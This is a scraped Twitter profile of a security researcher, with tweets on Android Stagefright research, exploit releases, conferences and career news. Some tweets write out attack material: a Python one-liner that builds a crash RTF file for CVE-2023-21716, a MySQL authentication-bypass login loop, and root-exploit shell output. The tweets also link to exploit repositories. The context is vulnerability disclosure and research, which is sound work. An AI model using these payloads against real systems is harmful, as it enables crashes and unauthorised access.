Joshua J. Drake @jduck Twitter profile

Pinned Tweet

Joshua J. Drake

7 months

Is your vendor committed to memory safe software? Maybe you should ask them. FWIW younger companies seem to be making the right decision up front. @NetRiseInc @runZeroInc @spr_networks are a few examples.

1

16

Last Seen Profiles

@just4funn0508

@aryanto54142075

@jurj44747

@sigmaphonkedits

@selly97323401

@doug_bate

@BinorRaja

@bokeplokalmalam

@KdaleNC

@mdpluth

@sokoharo

@TPrep_BoysHoops

@CharlineVentura

@ALEXANDPRESS

@SlutyBoa

@felix717_

@BinorRaja

@bokeptobrut

@bokeplokalmalam

@mitake_beignet_

@BandarStw

@aryanto54142075

@DanEngelkemi

@tkkmarket

@mattsun_s

@xioaerialist

@MorletGustavo

@stwmaniax

@3ka3ma3

@lanny87533839

@robinhourly

@jakecru61584630

@t_crimedog

@memomarid

Joshua J. Drake

@jduck

2 years

CVE-2023-21716 Python PoC (take 2) open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))

20

251

873

Joshua J. Drake

@jduck

8 years

Metasploit module for CVE-2015-3864 now available! Pull Request:

Stagefright CVE-2015-3864 release by jduck · Pull Request #7357 · rapid7/metasploit-framework

Verification List the steps needed to make sure this thing works Start msfconsole use exploit/android/browser/stagefright_mp4_tx3g_64bit Visit the exploit web server with a vulnerable device V...

github.com

7

174

202

Joshua J. Drake

@jduck

8 years

Here's a teaser of my CVE-2015-3864 Metasploit module. It improves on Metaphor significantly. See it in real time:

CVE-2015-3864 Metasploit Module

Recorded by jduck

asciinema.org

8

160

205

Joshua J. Drake

@jduck

6 months

@0xdade It's not sql injection if you control the whole query, right? Hehe

4

1

191

Joshua J. Drake

@jduck

7 years

A Simple Tool for Linux Kernel Audits

2

117

179

Joshua J. Drake

@jduck

10 years

Android Hacker's Handbook is now shipping! Get yours today! Electronic version release will be in ~ 2 weeks http://t.co/8fuwt8BgZt

22

173

132

Joshua J. Drake

@jduck

7 years

I'm officially fun-employed and looking for my next role. If you can see me filling a full time, part time, or contract position near you hit me up.

23

84

127

Joshua J. Drake

@jduck

3 years

Also... ICYMI, I joined Amazon. Amazed by all the quality people I know inside. <3

10

3

102

Joshua J. Drake

@jduck

9 years

I'm pleased to announce that I'm joining the zLabs team at @ZIMPERIUM http://t.co/DZdm98UotV

55

36

87

Joshua J. Drake

@jduck

8 years

I'm excited and honored to be invited to provide a keynote address Tuesday August 9th at USENIX WOOT!

11

20

85

Joshua J. Drake

@jduck

2 years

Dirty Pipe root exploit for Android (Pixel 6) -

GitHub - polygraphene/DirtyPipe-Android: Dirty Pipe root exploit for Android (Pixel 6)

Dirty Pipe root exploit for Android (Pixel 6). Contribute to polygraphene/DirtyPipe-Android development by creating an account on GitHub.

github.com

1

27

82

Joshua J. Drake

@jduck

6 months

I'm looking for a graphic designer to create some assets for my web site and business cards. Any recommendations?

90

3

75

Joshua J. Drake

@jduck

9 years

Google rewarded me $1,337 for these patches. That's after I talked them up from $1,000. Now Android has a VRP!

18

62

77

Joshua J. Drake

@jduck

8 years

Apparently #Stagefright had a cameo on #MrRobot tonight. I binge watched season 1 two weeks ago, but no season 2 yet. Woot. I'm honored!

5

12

75

Joshua J. Drake

@jduck

10 years

Hopefully this little tool will make Android device privilege auditing a bit easier for you - - Enjoy!

GitHub - jduck/privmap: A tool for enumerating the effective privileges of processes on an Android...

A tool for enumerating the effective privileges of processes on an Android device. - jduck/privmap

github.com

0

52

78

Joshua J. Drake

@jduck

6 months

I made my @secwest slides repo public and put a PDF in "releases" Feel free to reach out!

1

28

76

Joshua J. Drake

@jduck

2 years

Here's the advisory I sent to @msftsecresponse . I'm partial but I give myself an A-

4

24

76

Joshua J. Drake

@jduck

6 months

I agree with @bagder to disagree with @Apple .

2

19

71

Joshua J. Drake

@jduck

8 years

If you're new to vulnerability research or thinking about starting, come see @SushiDude and I's talk at @defcon 24!

4

38

69

Joshua J. Drake

@jduck

10 years

UDP Broadcast Command Execution as root on ASUS Routers (via infosvr) (cat's out of the bag: http://t.co/TCkIMDVBJA)

ASUSWRT 3.0.0.4.376_1071 - LAN Backdoor Command Execution

www.exploit-db.com

5

85

65

Joshua J. Drake

@jduck

8 years

@aragogando @oscaron @revskills @taviso for every tavis, there are 4 nations and 6 companies willing to buy it, find bugs, and not report

1

25

63

Joshua J. Drake

@jduck

9 years

Windows 7 Update appears to be compromised. Updates with random-ish names appearing on endpoints and WSUS servers http://t.co/Gz1l3BhvQu

9

152

61

Joshua J. Drake

@jduck

9 years

Yo dawg. I heard you like shells.. http://t.co/8tSuOEzYBN \o/

10

59

64

Joshua J. Drake

@jduck

6 months

@davepl1968 I still would love to know more about why it tells you there's an unspecified security risk when you browse into one. I have my thoughts, but you would be the expert.

4

0

63

Joshua J. Drake

@jduck

8 years

got this cool shirt from @jcran , no thanks to @Kym_Possible :-P

3

9

62

Joshua J. Drake

@jduck

9 years

The time for change has come. Last four years at Accuvant: transformative. My last day: this Friday. New gig? I'll announce next Monday.

48

13

60

Joshua J. Drake

@jduck

8 years

Infosec... I'm pretty sure there are 5x more recruiters than actual qualified candidates in the market.

7

8

60

Joshua J. Drake

@jduck

5 months

@malwrhunterteam My bet is on an SDR in the backpack :-)

4

0

55

Joshua J. Drake

@jduck

9 years

If you are looking for my @BlackHatEvents / @_defcon_ slides you can find them here: http://t.co/BkXYuL38Pf

2

44

55

Joshua J. Drake

@jduck

10 years

UDP Broadcast Command Execution as root on ASUS Routers (via infosvr)

GitHub - jduck/asus-cmd: ASUS Router infosvr UDP Broadcast root Command Execution

ASUS Router infosvr UDP Broadcast root Command Execution - jduck/asus-cmd

github.com

5

65

55

Joshua J. Drake

@jduck

6 months

Most people think my Stagefright work was all positive. Underneath the surface, I lost a lot of good friends and caused a lot of resentment. I found that dealing with the press was draining and ultimately I withdrew from the industry for years after. Hindsight is enlightening.

14

5

56

Joshua J. Drake

@jduck

9 years

Whaaa??? #Stagefright is used in the Nintendo 3DS and Wii U?!?!

GitHub - yellows8/browserhax_fright: libstagefright exploits for the Nintendo New3DS Internet...

libstagefright exploits for the Nintendo New3DS Internet Browser. - yellows8/browserhax_fright

github.com

3

74

53

Joshua J. Drake

@jduck

8 years

If you're curious about my keynote at #WOOT16 , check out the slides here:

1

36

54

Joshua J. Drake

@jduck

10 years

Maybe this other little tool will make auditing Android devices file systems a bit easier - - (compliments privmap)

GitHub - jduck/canhazaxs: A tool for enumerating the access to entries in the file system of an...

A tool for enumerating the access to entries in the file system of an Android device. - jduck/canhazaxs

github.com

3

31

54

Joshua J. Drake

@jduck

8 years

On C++ exploitation - For code exec: look for objects with vtables (virtual methods). For infoleak: look for objects without any

2

20

50

Joshua J. Drake

@jduck

9 years

trying not to spend more than the google patch rewards program gives for unassisted Android remote vulns... http://t.co/1LemLVIh1m

2

32

47

Joshua J. Drake

@jduck

4 months

I couldn't agree more with @daveaitel recent mailing list post. A random URL I visit should not have the same access to browser functionality as something I visit every day.

7

11

49

Joshua J. Drake

@jduck

11 years

Understanding the Linux Kernel, 3rd Edition http://t.co/fYPRILAx2T (cc @0xroot )

0

21

46

Joshua J. Drake

@jduck

8 years

If Google Pixel phones are not available unlockable, I won't buy/endorse them. Freedom for owners to control their device is paramount IMHO.

3

14

44

Joshua J. Drake

@jduck

10 years

It's official! I'm having another baby!

54

4

44

Joshua J. Drake

@jduck

12 years

LOL @ latest MySQL auth bypass - http://t.co/OJg4vbL8 - while ! mysql -uPasswordedUser -pAnything; do false; done

3

113

43

Joshua J. Drake

@jduck

7 years

Up to $200,000 for Android exploits!

2017 Android Security Rewards

News and insights on the Android platform, developer tools, and events.

android-developers.googleblog.com

0

28

43

Joshua J. Drake

@jduck

5 months

If you've never seen "The Net" starring Sandra Bullock, you're over due. Starting to wonder if these security product companies watched it and got crazy ideas.

13

7

44

Joshua J. Drake

@jduck

9 years

Zero Day Exploit Firm @ExodusIntel Goes Full-Disclosure on an unpatched Stagefright Vulnerability

Stagefright: Mission Accomplished? - Exodus Intelligence

Update (2015-08-13 1:16pm CST): We’ve been in contact with Zimperium and are working with them to provide coverage for detection of this flaw through their Stagefright Detector app. They have been...

blog.exodusintel.com

2

57

42

Joshua J. Drake

@jduck

3 years

Wow I haven't said anything here in a long time. How is everyone?

11

2

39

Joshua J. Drake

@jduck

6 months

Imagine using an ffmpeg vulnerability to compromise YouTube and then using that access to compromise everyone that watches YouTube.

5

4

41

Joshua J. Drake

@jduck

8 years

Declined for BlackHat... Guess everyone will get to see the exploit sooner than later =) Pretty happy about that actually.

14

10

38

Joshua J. Drake

@jduck

11 years

In case you were wondering... We present the Table of Contents of The Android Hacker's Handbook - http://t.co/xJ5bIowgRm

7

62

39

Joshua J. Drake

@jduck

3 years

Let the funemployment begin!

5

0

40

Joshua J. Drake

@jduck

7 months

There's a certain irony in seeing malware authors use Rust while industry drags their feet and resists the movement.

7

2

36

Joshua J. Drake

@jduck

9 years

If you didn't want to write format string exploits from scratch, @metasploit has: http://t.co/MA1C3gth9L, example: http://t.co/n20NAEEv9K

1

25

36

Joshua J. Drake

@jduck

10 years

BTW! If you want to see the code behind the ASUS router bug, look here: My favorite part is line 240!!!

5

34

35

Joshua J. Drake

@jduck

9 years

Just in case you thought ASLR mitigates libstagefright vulnerabilities -- Maybe patching is the best bet after all.

n6-browser-to-root-teaser.txt

GitHub Gist: instantly share code, notes, and snippets.

gist.github.com

2

39

33

Joshua J. Drake

@jduck

9 years

FYI, #Stagefright exploit release today. Keep your eye on

Blogs Archive - Zimperium

www.zimperium.com

3

35

32

Joshua J. Drake

@jduck

9 years

I haven't looked in depth, but this has the potential to be very bad - http://t.co/gasTyZ9dgm Stay tuned.

3

41

33

Joshua J. Drake

@jduck

9 years

FTR, CVEs for my Stagefright report: CVE-2015-1538, CVE-2015-1539, CVE-2015-3824, CVE-2015-3826, CVE-2015-3827, CVE-2015-3828, CVE-2015-3829

3

32

33

Joshua J. Drake

@jduck

6 months

I've had an amazing @secwest @CanSecWest . Utmost love and respect to @ivansprundel @richinseattle Joseph, Ethan, and many more amazing humans. To the future where hopefully we find the best. 🍻

3

4

34

Joshua J. Drake

@jduck

10 years

This article on C++11 blew my mind a little. http://t.co/qxfviyeQFX

4

23

34

Joshua J. Drake

@jduck

9 years

ICYMI, my #Stagefright slides are at http://t.co/BkXYuL38Pf

0

30

31

Joshua J. Drake

@jduck

8 years

Hardening Measures in Android N Cripple System Utility and Security Applications

7

31

32

Joshua J. Drake

@jduck

10 years

my wife is getting super close to giving birth. (2nd / girl) so nervous and excited. I'll be on extended afk soon

33

0

29

Joshua J. Drake

@jduck

7 months

I've been evaluating MTE on Pixel 8 Pro. I guess it's sort of my own private CTF. If someone at Google/Android would like to sponsor the work, that would be awesome. If not, oh well. Either way, coming soon-ish...

3

4

32

Joshua J. Drake

@jduck

8 years

One thing I have learned from Pegasus and Stagefright is that vendor security teams seem to misunderstand their attack surfaces.

4

22

32

Joshua J. Drake

@jduck

9 years

shell @shamu :/data/local/tmp $ ./x [*] CVE-2015-3636 ho!! commencing dangerous actions... [*] got root!! shell @shamu :/data/local/tmp # exit

3

29

Joshua J. Drake

@jduck

10 years

We finally got the @PlaidCTF harry potter write up out! http://t.co/QFg6KNVHfv

2

21

31

Joshua J. Drake

@jduck

12 years

I heard there was a new Java 0day found being exploited in the wild -- http://t.co/ivRhGJTL

4

124

32

Joshua J. Drake

@jduck

9 years

The #Stagefright public exploit release is held up by marketing. I'm doing a FrienNDA beta , tell me your github!

GitHub - jduck/cve-2015-1538-1: An exploit for CVE-2015-1538-1 - Google Stagefright ‘stsc’ MP4 Atom...

An exploit for CVE-2015-1538-1 - Google Stagefright ‘stsc’ MP4 Atom Integer Overflow Remote Code Execution - jduck/cve-2015-1538-1

github.com

42

19

31

Joshua J. Drake

@jduck

8 years

I thought about putting up an access point called "Samsung Galaxy Note 7" on the plane but then didn't want to cause panic or delays.

1

5

32

Joshua J. Drake

@jduck

9 years

Yay! @BlackHatEvents graciously accepted my submission to speak about my research on @Android 's StageFright!

7

29

30

Joshua J. Drake

@jduck

11 years

BTW! You can pre-order Android Hacker's Handbook at http://t.co/1dsMBg48Um =)

6

31

Joshua J. Drake

@jduck

11 years

that feeling when you realize why "rm -rf ~" is taking so long.

6

37

31

Joshua J. Drake

@jduck

3 years

To those we have lost, rest well. To those that remain, I hope your 2022 will be everything you want it to be. Happy new year!

1

0

31

Joshua J. Drake

@jduck

9 years

'All Android devices' vulnerable to new LTE security flaw | ZDNet http://t.co/XGS9kDZ2cL

2

39

31

Joshua J. Drake

@jduck

11 years

and... android hacker's handbook is a wrap. off to production it goes! what a relief! cc @quine @collinrm @pof @s7ephen @ochsff

17

36

30

Joshua J. Drake

@jduck

11 years

Remember kids, Android devices are like snowflakes. No two are identical.

4

103

29

Joshua J. Drake

@jduck

9 years

Looks like @metasploit is finally getting some @Android love! Several post modules just added to remove lock screens etc.

0

25

30

Joshua J. Drake

@jduck

5 months

A whole day of OSS dumpster fire and no annotated disassembly? I guess we all value our weekend over the truth.

4

0

28

Joshua J. Drake

@jduck

8 years

wouldn't it be funny if one day people found out the entire jailbreak scene was a giant XXX_ebooks style network of AI bots (excl producers)

2

8

29

Joshua J. Drake

@jduck

8 years

Despite @daveaitel 's comments, I think this paper is a good primer for those new to the vulnerability landscape

2

14

28

Joshua J. Drake

@jduck

11 years

Reversing and Auditing Android's Proprietary Bits (my @reconmtl slides are now available at http://t.co/Ux8GS0V6rT) cc @iamnion

2

44

29

Joshua J. Drake

@jduck

8 years

How come no one is talking about how the iOS 9.3 advisory lists CVE-2016-0801/0802 (remote kernel RCE via wifi on Android) ?!

5

34

28

Joshua J. Drake

@jduck

8 years

I've been diving into @radareorg the last few days. I'm really impressed and hoping to do what I can to push the project forward =)

0

15

29

Joshua J. Drake

@jduck

10 years

USB/IP in Linux 3.17 looks interesting! http://t.co/TuW2Jha0k7

7

35

27

Joshua J. Drake

@jduck

8 months

Take away from automotive @Pwn2Own_Contest ? Whoever develops these products have nearly zero understanding of security/common attacks. Also, who certified all this stuff??? What are they even doing?

2

4

28

Joshua J. Drake

@jduck

8 years

Honored to be nominated for @PwnieAwards in multiple categories but doubt I'll win in any... OMG what a year for infosec.

6

3

29

Joshua J. Drake

@jduck

6 years

I missed BH/DC this year for the first time in 13 years. Didn't really miss Vegas, but I definitely missed some of you fine people. Hope you had fun and stayed safe.

4

0

29

Joshua J. Drake

@jduck

8 years

Happy holidays to all of you!

0

1

28

Joshua J. Drake

@jduck

11 years

Just released the advisory for two Android SDK security issues I found - http://t.co/1o0tWJ113X

5

36

27

Joshua J. Drake

@jduck

10 years

The @Blackphone_ch guys sent this to thank me for the bug report! Thanks @Netsecrex for the booze and kind words!! http://t.co/BDm8J03N8g

5

15

28

Joshua J. Drake

@jduck

7 months

For some unknown reason, I just woke up in the middle of the night thinking the HP CEO should face criminal charges for bricking printers. If I bricked a bunch of printers, I would expect to face charges. But hey, I don't even like printers.

0

11

25

Joshua J. Drake

@jduck

1 year

Another great memory from this year's @defcon ... Explaining reverse engineering to @mc_frontalot at the 562 party. "When you can reverse engineer, everything is open source."

5

3

25

Joshua J. Drake

@jduck

9 years

Protecting from HackingTeam’s Mobile APT › Zimperium Mobile Security Blog - http://t.co/EpIIU8WtdH

1

20

25

Joshua J. Drake

@jduck